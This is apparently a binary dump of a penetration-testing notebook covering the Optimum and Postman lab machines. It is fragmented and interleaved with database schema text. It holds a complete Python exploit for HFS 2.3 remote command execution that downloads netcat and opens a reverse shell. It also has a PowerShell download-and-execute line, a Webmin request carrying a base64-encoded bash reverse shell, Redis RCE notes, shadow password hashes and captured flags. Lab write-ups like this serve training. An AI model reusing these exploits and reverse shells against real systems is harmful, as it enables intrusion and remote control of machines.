SQLite format 3@ (-  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node Dk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CX#9'  Enumerationnmap -sC -sV -oA ./optimum -Pn 10.10.10.8 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-06 14:34 EDT Nmap scan report for 10.10.10.8 Host is up (0.072s latency). Not shown: 999 f u5' 10.10.10.8 - Optimum@?   <B<eYS_}kwqMG!            " !    vne\SJA8/&                "!     BBeYS_}kwqMG            " !  
Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node 's\+_tablebookmarkbookmark CREATE TABLE bookmark ( node_id INTEGER UNIQUE, sequence INTEGER )/ Cindexsqlite_autoindex_bookmark_1bookmark /Cindexsqlite_autoindex_children_1childrenr7tablechildrenchildrenCREATE TABLE children ( node_id INTEGER UNIQUE, father_id INTEGER, sequence INTEGER ) tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )  iltered ports PORT STATE SERVICE VERSION 80/tcp open http HttpFileServer httpd 2.3 |_http-server-header: HFS 2.3 |_http-title: HFS / Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 16.57 seconds custom-colors*A>E w k'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXF#9'  Enumerationnmap -sC -sV -oA ./optimum -Pn 10.10.10.8 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-06 14:34 EDT Nmap scan report for 10.10.10.8 8#'  Enumerationnmap -sC -sV -Pn -p- -oA ./Postman 10.10.10.160 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-13 14:05 EDT Nmap scan report for 10.10.10.160 Host is up (0.025s latency). 9 dW} 0Wk '  SNMPcustom-colorsA[DԢA[G!Bj '  SMBcustom-colorsA[PA[DNn )'  Other Servicescustom-colorsXA[Adk '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&.%['  Web Servicescustom-colors"A(V Qyy'J='   OtherREDIS RCE Unauthenticated CONFIRMED - CVE-2018-12326 redis-cli -h 10.10.10.160 10.10.10.160:6379> CONFIG GET * 1) "dbfilename" 2) "dump.rdb" 3) "requirepass" 4) "" 5) "masHq/'  Post Exploitationcustom-colors*AIZnn%'  ExploitationService Exploited: Rejetto HTTP File Server (HFS) 2.3.x Vulnerability Type: RCE Exploit POC: %K'  ExploitationService Exploited: RCi '  DBcustom-colorsA[EA[Sel Description: Discovery of Vulnerability Exploit Code Used #!/usr/bin/python # Exploit Title: HttpFileServer 2.3.x Remote Command Execution # Google Dork: intext:"httpfileserver 2.3" # Date: 04-01-2016 # Remote: Yes # Exploit Author: Avinash Kumar Thapa aka "-Acid" # Vendor Homepage: http://rejetto.com/ # Software Link: http://sourceforge.net/projects/hfs/ # Version: 2.3.x # Tested on: Windows Server 2008 , Windows 8, Windows 7 # CVE : CVE-2014-6287 # Description: You can use HFS (HTTP File Server) to send and receive files. # It's different from classic file sharing because it uses web technology to be more compatible with today's Internet. # It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. 
It has been successfully tested with Wine under Linux. #Usage : python Exploit.py <Target IP address> <Target Port Number> #EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe). # You may need to run it multiple times for success! import urllib2 import sys try: def script_create(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}") def execute_script(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}") def nc_run(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}") ip_addr = "192.168.44.128" #local IP address local_port = "443" # Local Port number vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with" save= "save|" + vbs vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs" exe= "exec|"+vbs2 vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port exe1= "exec|"+vbs3 script_create() execute_script() nc_run() except: print """[.]Something went wrong..! Usage is :[.] 
python exploit.py <Target IP address> <Target Port Number> Don't forgot to change the Local IP address and Port number on the script""" Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,A6>{' =< !"#$%&'()*+,-./012345678=>e Registered Owner: Windows User Registered Organization: Product ID: 00252-70000-00000-AA535 Original Install Date: 18/3/2017, 1:51:36 �� System Boot Time: 13/7/2020, 4:03:10 �� System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 1 Processor(s) Installed.  bin:*:18132:0:99999:7::: sys:*:18132:0:99999:7::: sync:*:18132:0:99999:7::: games:*:18132:0:99999:7::: man:*:18132:0:99999:7:::  lp:*:18132:0:99999:7::: mail:*:18132:0:99999:7::: news:*:18132:0:99999:7::: uucp:*:18132:0:99999:7::: proxy:*:18132:0:99999:7::: www-data:*:18132:0:99999:7::: backup:*:18132:0:99999:7::: list:*:18132:0:99999:7::: irc:*:18132:0:99999:7::: gnats:*:18132:0:99999:7::: nobody:*:18132:0:99999:7::: systemd-network:*:18132:0:99999:7::: systemd-resolve:*:18132:0:99999:7::: syslog:*:18132:0:99999:7::: messagebus:*:18132:0:99999:7::: _apt:*:18132:0:99999:7::: uuidd:*:18132:0:99999:7::: sshd:*:18132:0:99999:7::: Matt:$6$QNBwoLyZ$s6GTOYGr7.6USu4BlCcjFsWhvgQ5BVOqV830iiB4TTc3i4jbuaCxuuF9AO7uuP65PRNMnREZ7NLSMr7XOSGe80:18133:0:99999:7::: redis:*:18133:0:99999:7::: custom-colors$ApeVexe IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.10/Sherlock.ps1') Powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.10/Sherlock.ps1') Title : User Mode to Ring (KiTrap0D) MSBulletin : MS10-015 CVEID : 2010-0232 Link : https://www.exploit-db.com/exploits/11199/ VulnStatus : Not supported on 64-bit systems Title : Task Scheduler .XML MSBulletin : MS10-092 CVEID : 2010-3338, 2010-3888 Link : https://www.exploit-db.com/exploits/19930/ VulnStatus : Not Vulnerable Title : NTUserMessageCall Win32k Kernel Pool Overflow MSBulletin : MS13-053 CVEID  : 2013-1300 Link 
: https://www.exploit-db.com/exploits/33213/ VulnStatus : Not supported on 64-bit systems Title : TrackPopupMenuEx Win32k NULL Page MSBulletin : MS13-081 CVEID : 2013-3881 Link : https://www.exploit-db.com/exploits/31576/ VulnStatus : Not supported on 64-bit systems Title : TrackPopupMenu Win32k Null Pointer Dereference MSBulletin : MS14-058 CVEID : 2014-4113 Link : https://www.exploit-db.com/exploits/35101/ VulnStatus : Not Vulnerable Title : ClientCopyImage Win32k MSBulletin : MS15-051 CVEID : 2015-1701, 2015-2433 Link : https://www.exploit-db.com/exploits/37367/ VulnStatus : Not Vulnerable Title : Font Driver Buffer Overflow MSBulletin : MS15-078 CVEID : 2015-2426, 2015-2433 Link : https://www.exploit-db.com/exploits/38222/ VulnStatus : Not Vulnerable Title : 'mrxdav.sys' WebDAV MSBulletin : MS16-016 CVEID : 2016-0051 Link : https://www.exploit-db.com/exploits/40085/ VulnStatus : Not supported on 64-bit systems Title : Secondary Logon Handle MSBulletin : MS16-032 CVEID : 2016-0099 Link : https://www.exploit-db.com/exploits/39719/ VulnStatus : Appears Vulnerable Title : Windows Kernel-Mode Drivers EoP MSBulletin : MS16-034 CVEID : 2016-0093/94/95/96 Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1 6-034? VulnStatus : Appears Vulnerable Title : Win32k Elevation of Privilege MSBulletin : MS16-135 CVEID : 2016-7255 Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S ample-Exploits/MS16-135 VulnStatus : Appears Vulnerable Title : Nessus Agent 6.6.2 - 6.10.3 MSBulletin : N/A CVEID : 2017-7199 Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.h tml VulnStatus : Not Vulnerable kali@kali:/Windows-Exploit-Suggester$ python windows-exploit-suggester.py --database 2020-07-06-mssb.xls --systeminfo /home/kali/Desktop/optimum/sysinfo.txt [*] initiating winsploit version 3.3... 
[*] database file detected as xls or xlsx based on extension [*] attempting to read from the systeminfo input file  [+] systeminfo input file read successfully (utf-8) [*] querying database file for potential vulnerabilities [*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits [*] there are now 246 remaining vulns ! [+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin [+] windows version identified as 'Windows 2012 R2 64-bit' [*] " [E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important [*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135) # [*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2) [*] https://github.com/tinysec/public/tree/master/CVE-2016-7255 $ [*] [E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important % [*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) [*] & [M] MS16-075: Security Update for Windows SMB Server (3164038) - Important [*] https://github.com/foxglovesec/RottenPotato ' [*] https://github.com/Kevin-Robertson/Tater [*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege ( [*] https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation [*] ) [E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important [*] https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC [*] https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC [*] [E] MS16-063: Cumulative Security Update for Internet Explorer 
(3163649) - Critical + [*] https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC [*] , [E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important [*] https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF - [*] https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC [*] https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC . [*] https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#) [*] / [M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important [*] https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF 0 [*] https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC [*] https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC 1 [*] [E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important 2 [*] Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https://www.exploit-db.com/exploits/40039/, PoC [*] [E] MS16-007: Security Update f3or Microsoft Windows to Address Remote Code Execution (3124901) - Important [*] https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC [*] https:4//www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC [*] [E] MS15-132: Security Update for Microsoft Windows to 
Address Remote Code Execution (3116162) - Important 5 [*] https://www.exploit-db.com/exploits/38968/ -- Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132), PoC [*] https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object els.dll DLL Planting (MS165-134), PoC [*] [E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical 7 [*] https://www.exploit-db.com/exploits/39698/ -- Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112) [*] 8 [E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important [*] https://www.exploit-db.com/exploits/38474/ -- Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111), PoC 9 [*] [E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important [*] https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation, PoC [*] https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler DeleteExpiredTaskAfter FileNot shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA) | 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA) |_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: The Cyber Geek's Personal Website 6379/tcp open redis Redis key-value store 4.0.9 10000/tcp open http MiniServ 1.910 (Webmin httpd) |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 58.42 seconds custom-colors*A(9000/package-updates/update.cgi?xnavigation=1">https://10.10.10.160:10000/package-updates/update.cgi?xnavigation=1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Progressive-URL: https://10.10.10.160:10000/package-updates/update.cgi X-Requested-From: package-updates X-Requested-From-Tab: webmin X-Requested-With: XMLHttpRequest Content-Length: 119 Connection: close Cookie: redirect=1; testing=1; sid=0651c32f88fa2dec858911a2afec1d7a u=acl%2Fapt&u=$(echo${IFS}YmFzaCAtYyAiYmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4xMC85OTk5IDA%2bJjEi|base64${IFS}-d|bash) Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsAp8rWindows ClientCopyImage Win32k Exploit, MSF [*] [E] MS15-010: Vulnerabilities in Wi: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Lateral to Matt using /opt/id_rsa.bak's credentials Privesc to Root - https://github.com/Dog9w23/Webmin-1.910-Exploit/blob/master/Webmin%201.910%20-%20Remote%20Code%20Execution%20using%20BurpSuite Exploit Code Used POST /package-updates/update.cgi HTTP/1.1 Host: 10.10.10.160:10000 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC [*] [M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical [*] https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC [*] http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC [*] rich_text>http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC 
[*] http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF [*] http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF [*] http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF [*] [M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important [*] < OO\O G'   NetworkIPConfig\IFConfig Network Processes ARP DNS Routecustom-colors$A[*܁p)'   Users & GroupsUsers Groupscustom-colors$A[k׀.9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILg 1)u'  Script ResultsC:\Users\kostas\Desktop>systeminfo systeminfo Hi)e'  Script Results ######################################################### # Local Linux Enumeration & Privilege Escalation Script # ######################################M X#X/]'  Running ProcessesProcess Listcustom-colors$AIwq&#w'  File SystemWriteable Files\Directories Directory List custom-colors$A[3QZ-U'  Host InformationOperating System Architecture Domain Installed Updates custom-colors$A[4* N^QN~o'   Hashesroot:$6$BY.59Uqc$OCL4yigbZkNkprjAJHjUEzPIjvbYUuyNDwBwcl9/R3doZU3myn/cnTakyFmQRUrbiqwdxTfYs/MmYmLOCmROS1:18134:0:99999:7::: daemon:*:18132:0:99999:7::: i'  Passwordscustom-colors$A?'!h'   Hashescustom-colors$A?&&g'  Goodiescustom-colorsVA?& c6+U'   Priv EscalationService Exploited:;)c'  Scheduled JobsScheduled Taskscustom-colors$ANl w!9' 10.10.1G/-'  Proof\Flags\OtherUser - Matt - 517ad0ec2458ca97af8d93aac08a2f3c Root - a257741c5bed8be7778c6ed95686ddcecustom-colors$Ap(#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtscan -r 10.11.1.0/24 ☐ smbtree Software Versions Potential Exploitscustom-colorsANlH{xEDIS RCE Unauthenticated Vulnerability Type: Exploit POC: CVE-2018-12326 Description: Discovery of Vulnerability redis-cli -h 10.10.10.160 10.10.10.160:6379> CONFIG GET * Exploit Code 
Used https://github.com/Avinash-acid/Redis-Server-Exploit/blob/master/redis.py Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,A,Zonfig ☐ Submit too OSCP Exam Panel custom-colorsA xt>http://www.exploit-db.com/exploits/35055/ -- Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060), PoC [*] http://www.exploit-db.com/exploits/35020/ -- MS14-060 Microsoft Windows OLE Package Manager Code Execution, MSF [*] [M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical [*] http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF [*] [E] MS13-101: Vulnerabilities inw!9' 10.10.10.160 - Postmancustom-colorsA'^Rh  ' Log Bookcustom-colors(AI^Fich_text>Individual Host Scanning ☐ nmap --top-ports 20 --open -iL iplist.txt ☐ nmap -sS -A -sV -O -p- ipaddress ☐ nmap -sU ipaddress Service Scanning WebAppNiktodirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test Linux\Windows ☐ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipaGddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Elsenmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the softward Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalationacesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete filescustom-colorsANl<A[ڸ.,Iterauth" 6) "" 7) "cluster-announce-ip" 8) "" 9) "unixsocket" 10) "" 11) "logfile" 12) 
"/var/log/redis/redis-server.log" 13) "pidfile" 14) "/var/run/redis/redis-server.pid" 15) "slave-announce-ip" 16) "" 17) "maxmemory" 18) "0" 19) "proto-max-bulk-len" 20) "536870912" 21) "client-query-buffer-limit" 22) "1073741824" 23) "maxmemory-samples" 24) "5" 25) "lfu-log-factor" 26) "10" 27) "lfu-decay-time" 28) "1" 29) "timeout" 30) "0" 31) "active-defrag-threshold-lower" 32) "10" 33) "active-defrag-threshold-upper" 34) "100" 35) "active-defrag-ignore-bytes" 36) "104857600" 37) "active-defrag-cycle-min" 38) "25" 39) "active-defrag-cycle-max&quoJt; 40) "75" 41) "auto-aof-rewrite-percentage" 42) "100" 43) "auto-aof-rewrite-min-size" 44) "67108864" 45) "hash-max-ziplist-entries" 46) "512" 47) "hash-max-ziplist-value" 48) "64" 49) "list-max-ziplist-size" 50) "-2" 51) "list-compress-depth" 52) "0" 53) "set-max-intset-entries" 54) "512" 55) "zset-max-ziplist-entries" 56) "128" 57) "zset-max-ziplist-value" 58) "64" 59) "hll-sparse-max-bytes" 60) "3000" 61) "lua-time-limit" 62) "5000" 63) "slowlog-log-slower-than" 64) "10000" 65) "latency-monitor-threshold" 66) "0" 67) "slowlog-max-len" 68) "128" 69) "port" 70) "6379" 71) "cluster-announce-port" 72) "0" 73) "cluster-announce-bus-port" K74) "0" 75) "tcp-backlog" 76) "511" 77) "databases" 78) "16" 79) "repl-ping-slave-period" 80) "10" 81) "repl-timeout" 82) "60" 83) "repl-backlog-size" 84) "1048576" 85) "repl-backlog-ttl" 86) "3600" 87) "maxclients" 88) "10000" 89) "watchdog-period" 90) "0" 91) "slave-priority" 92) "100" 93) "slave-announce-port" 94) "0" 95) "min-slaves-to-write" 96) "0" 97) "min-slaves-max-lag" 98) "10" 99) "hz" 100) "10" 101) "cluster-node-timeout" 102) "15000" 103) "cluster-migration-barrier" 104) "1" 105) "cluster-slave-validity-factor" 106) "10" 107) "repl-diskless-sync-delay" 108) "5" 109) "tcp-keepalive" 110) "300" 111) "cLluster-require-full-coverage" 112) "yes" 113) "cluster-slave-no-failover" 114) "no" 115) "no-appendfsync-on-rewrite" 116) "no" 117) "slave-serve-stale-data" 118) "yes" 119) 
"slave-read-only" 120) "yes" 121) "stop-writes-on-bgsave-error" 122) "yes" 123) "daemonize" 124) "yes" 125) "rdbcompression" 126) "yes" 127) "rdbchecksum" 128) "yes" 129) "activerehashing" 130) "yes" 131) "activedefrag" 132) "no" 133) "protected-mode" 134) "no" 135) "repl-disable-tcp-nodelay" 136) "no" 137) "repl-diskless-sync" 138) "no" 139) "aof-rewrite-incremental-fsync" 140) "yes" 141) "aof-load-truncated" 142) "yes" 143) "aof-use-rdb-preamble" 144) "no" 145) "lazyfree-lazy-eviction" 146) &quot;no" 147) "lazyfree-lazy-expire" 148) "no" 149) "lazyfree-lazy-server-del" 150) "no" 151) "slave-lazy-flush" 152) "no" 153) "maxmemory-policy" 154) "noeviction" 155) "loglevel" 156) "notice" 157) "supervised" 158) "no" 159) "appendfsync" 160) "everysec" 161) "syslog-facility" 162) "local0" 163) "appendonly" 164) "no" 165) "dir" 166) "/var/lib/redis" 167) "save" 168) "900 1 300 10 60 10000" 169) "client-output-buffer-limit" 170) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60" 171) "unixsocketperm" 172) "0" 173) "slaveof" 174) "" 175) "notify-keyspace-events" 176) "" 177) "bind" 178) "0.0.0.0 ::1" 10.10.10.160:6379>custom-colorsA[EϯA) N################### # www.rebootuser.com # version 0.982 [-] Debug Info [+] Thorough tests = Enabled Scan started at: Mon Jul 13 19:59:14 BST 2020  ### SYSTEM ############################################## [-] Kernel information: Linux Postman 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux [-] Kernel information (continued): Linux version 4.15.0-58-generic (buildd@lcy01-amd64-013) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 [-] Specific release information: DISTRIB_ID=Ubuntu DISTRIB_RELEASE=18.04 DISTRIB_CODENAME=bionic DISTRIB_DESCRIPTION="Ubuntu 18.04.3 LTS" NAME="Ubuntu" VERSION="18.04.3 LTS (Bionic Beaver)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 18.04.3 LTS" VERSION_ID=&quOot;18.04" HOME_URL="https://www.ubuntu.com/" 
SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" VERSION_CODENAME=bionic UBUNTU_CODENAME=bionic [-] Hostname: Postman ### USER/GROUP ########################################## [-] Current user/group info: uid=107(redis) gid=114(redis) groups=114(redis) [-] Users that have previously logged onto the system: Username Port From P Latest root pts/0 10.10.14.3 Tue Oct 29 09:26:37 +0000 2019 Matt pts/4 192.168.1.4 Mon Aug 26 00:04:37 +0100 2019 redis pts/0 10.10.14.10 Mon Jul 13 19:52:52 +0100 2020 [-] Who else is logged on: 19:59:14 up 1:04, 1 user, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT redis pts/0 10.10.14.10 19:52 2.00s 0.03s 0.00s /bin/bash ./LinEnum.sh -t [-] Group memberships: uid=0(root) gid=0(root) groups=0(root) uid=1(daemon) gid=1(daemon) groups=1(daemon) uid=2(bin) gid=2(bin) groups=2(bin) uid=3(sys) gid=3(sys) groups=3(sys) uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) uid=5(games) gid=60(games) groups=60(games) uid=6(man) gid=12(man) groups=12(man) uid=7(lp) gid=7(lp) groups=7(lp) uid=8(mail) gid=8(mail) groups=8(mail) uid=9(news) gid=9(news) groups=9(news) uid=10(uucp) gid=10(uucp) groups=10(uucp) uid=13(proxy) gid=13(proxy) groups=13(prQoxy) uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=34(backup) gid=34(backup) groups=34(backup) uid=38(list) gid=38(list) groups=38(list) uid=39(irc) gid=39(irc) groups=39(irc) uid=41(gnats) gid=41(gnats) groups=41(gnats) uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network) uid=101(systemd-resolve) 